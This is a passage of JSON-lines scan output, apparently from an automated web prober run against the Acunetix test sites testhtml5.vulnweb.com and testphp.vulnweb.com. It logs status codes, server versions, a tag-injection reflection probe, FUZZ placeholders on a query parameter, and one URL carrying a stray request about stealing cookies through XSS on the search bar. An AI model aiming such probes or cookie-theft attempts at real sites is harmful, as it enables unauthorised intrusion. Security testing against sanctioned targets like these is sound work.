Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"time\":\"355.369532ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.606836544Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js:202\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js:202\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/libs/sessvars.js:202\",\"time\":\"353.998673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.621295101Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/post.js\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/post.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/post.js\",\"time\":\"343.116891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":621,\"lines\":121,\"status_code\":200,\"content_length\":3319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.626480093Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/partials/\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/partials/\",\"title\":\"403 Forbidden\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/\",\"time\":\"351.376885ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":8,\"status_code\":403,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.646494952Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/services/itemsService.js\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/services/itemsService.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/services/itemsService.js\",\"time\":\"339.773036ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":133,\"lines\":27,\"status_code\":200,\"content_length\":723,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.655309886Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/css/?%3Cmy_tag_88fc8f0ec9141866cb14f3125be901b4/%3E\",\"input\":\"http://testhtml5.vulnweb.com:80/static/css/?%3Cmy_tag_88fc8f0ec9141866cb14f3125be901b4/%3E=\",\"title\":\"403 Forbidden\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/css/?%3Cmy_tag_88fc8f0ec9141866cb14f3125be901b4/%3E\",\"time\":\"342.610728ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":8,\"status_code\":403,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.669359453Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/text/xml\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/text/xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/text/xml\",\"time\":\"346.737457ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.68711366Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/css/style.css\",\"input\":\"http://testhtml5.vulnweb.com:80/static/css/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/css/style.css\",\"time\":\"352.4336ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":91,\"lines\":39,\"status_code\":200,\"content_length\":570,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.697313806Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/tapan.php\",\"input\":\"http://testhtml5.vulnweb.com:80/tapan.php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/tapan.php\",\"time\":\"343.291193ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:12.53714843Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/about.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/about.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/about.html\",\"time\":\"352.325217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":341,\"lines\":48,\"status_code\":200,\"content_length\":2211,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:12.565866215Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/archive.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/archive.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/archive.html\",\"time\":\"351.995818ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":306,\"lines\":34,\"status_code\":200,\"content_length\":1175,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:12.578041928Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/carousel.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/carousel.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/carousel.html\",\"time\":\"352.954832ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":155,\"lines\":17,\"status_code\":200,\"content_length\":937,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.541647462Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/itemsList.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/itemsList.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/itemsList.html\",\"time\":\"348.57162ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":586,\"lines\":57,\"status_code\":200,\"content_length\":2713,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.548173993Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/latest.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/latest.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/latest.html\",\"time\":\"352.437632ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":12,\"lines\":4,\"status_code\":200,\"content_length\":154,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.736527087Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/popular.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/popular.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/popular.html\",\"time\":\"351.435962ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":17,\"lines\":5,\"status_code\":200,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.787494135Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/redir.html\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/redir.html\",\"title\":\"Loading ...\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/redir.html\",\"time\":\"346.728684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":51,\"lines\":14,\"status_code\":200,\"content_length\":389,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.938960096Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/post.js\",\"input\":\"http://testhtml5.vulnweb.com/static/app/post.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/post.js\",\"time\":\"349.03368ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":621,\"lines\":121,\"status_code\":200,\"content_length\":3319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:13.966638012Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/services/itemsService.js\",\"input\":\"http://testhtml5.vulnweb.com/static/app/services/itemsService.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/services/itemsService.js\",\"time\":\"352.466487ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":133,\"lines\":27,\"status_code\":200,\"content_length\":723,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.022820399Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/text/xml\",\"input\":\"http://testhtml5.vulnweb.com/static/app/text/xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/text/xml\",\"time\":\"351.72265ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.097650934Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/css/style.css\",\"input\":\"http://testhtml5.vulnweb.com/static/css/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/css/style.css\",\"time\":\"343.273863ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":91,\"lines\":39,\"status_code\":200,\"content_length\":570,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.141931156Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/img/ajax-loader.gif\",\"input\":\"http://testhtml5.vulnweb.com/static/img/ajax-loader.gif\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/img/ajax-loader.gif\",\"time\":\"339.879146ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":21,\"lines\":12,\"status_code\":200,\"content_length\":847,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.169583773Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/img/logo2.png\",\"input\":\"http://testhtml5.vulnweb.com/static/img/logo2.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/img/logo2.png\",\"time\":\"343.451244ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":12,\"lines\":12,\"status_code\":200,\"content_length\":2736,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.454006766Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/scr/1a0c8d2e0e2f22221f5b236a93823df6.png\",\"input\":\"http://testhtml5.vulnweb.com/static/scr/1a0c8d2e0e2f22221f5b236a93823df6.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/scr/1a0c8d2e0e2f22221f5b236a93823df6.png\",\"time\":\"352.170026ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.524397065Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/scr/20ba87fba91c9b513ae3354265ef97ef.png\",\"input\":\"http://testhtml5.vulnweb.com/static/scr/20ba87fba91c9b513ae3354265ef97ef.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/scr/20ba87fba91c9b513ae3354265ef97ef.png\",\"time\":\"342.193629ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.590879119Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/scr/default.png\",\"input\":\"http://testhtml5.vulnweb.com/static/scr/default.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/scr/default.png\",\"time\":\"356.224882ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":10,\"lines\":10,\"status_code\":200,\"content_length\":6934,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:14.703740068Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/text/xml\",\"input\":\"http://testhtml5.vulnweb.com/text/xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/text/xml\",\"time\":\"340.751934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.131339986Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"http://testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"345.812464ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.188640727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/\",\"input\":\"http://testphp.vulnweb.com/\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"357.490618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.328595682Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/ I want to start testing on stealing cookies through exploit xss on search bar at testphp vulnweb\",\"input\":\"http://testphp.vulnweb.com/%20I%20want%20to%20start%20testing%20on%20stealing%20cookies%20through%20exploit%20xss%20on%20search%20bar%20at%20testphp%20vulnweb\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20I%20want%20to%20start%20testing%20on%20stealing%20cookies%20through%20exploit%20xss%20on%20search%20bar%20at%20testphp%20vulnweb\",\"time\":\"344.152082ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.9493988Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→FUZZ•\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92FUZZ%E2%80%A2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92FUZZ%E2%80%A2\",\"time\":\"344.467088ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.9543857Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→FUZZ\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92FUZZ\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92FUZZ\",\"time\":\"351.371067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.959771631Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→listproducts.php\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92listproducts.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92listproducts.php\",\"time\":\"350.935605ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.972523088Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→listproducts.php?cat=FUZZ********************************************************\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92listproducts.php?cat=FUZZ********************************************************\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92listproducts.php?cat=FUZZ********************************************************\",\"time\":\"343.839701ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.974214283Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→listproducts.php?cat=FUZZ\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92listproducts.php?cat=FUZZ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92listproducts.php?cat=FUZZ\",\"time\":\"348.305034ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:18.996966089Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/\\ufffd\\ufffd\",\"input\":\"http://testphp.vulnweb.com/%E2%80\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%E2%80\",\"time\":\"338.937722ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:19.001773271Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/˓→listproducts.php?cat=FUZZ*********************************************************\",\"input\":\"http://testphp.vulnweb.com/%CB%93%E2%86%92listproducts.php?cat=FUZZ*********************************************************\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%CB%93%E2%86%92listproducts.php?cat=FUZZ*********************************************************\",\"time\":\"352.847245ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:19.023731591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/–\",\"input\":\"http://testphp.vulnweb.com/%E2%80%93\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%E2%80%93\",\"time\":\"351.771912ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:19.032561955Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/’\",\"input\":\"http://testphp.vulnweb.com/%E2%80%99\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%E2%80%99\",\"time\":\"342.86013ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:19.045859263Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/”\",\"input\":\"http://testphp.vulnweb.com/%E2%80%9D\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%E2%80%9D\",\"time\":\"343.550588ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:22.88966887Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/********************************************************\",\"input\":\"http://testphp.vulnweb.com/********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/********************************************************\",\"time\":\"348.564328ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:22.914505734Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/*********************************************************\",\"input\":\"http://testphp.vulnweb.com/*********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/*********************************************************\",\"time\":\"346.426729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:22.920168853Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/,\",\"input\":\"http://testphp.vulnweb.com/,\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/,\",\"time\":\"339.322285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:23.896369325Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.В\",\"input\":\"http://testphp.vulnweb.com/.%D0%92\",\"title\":\"404 Not 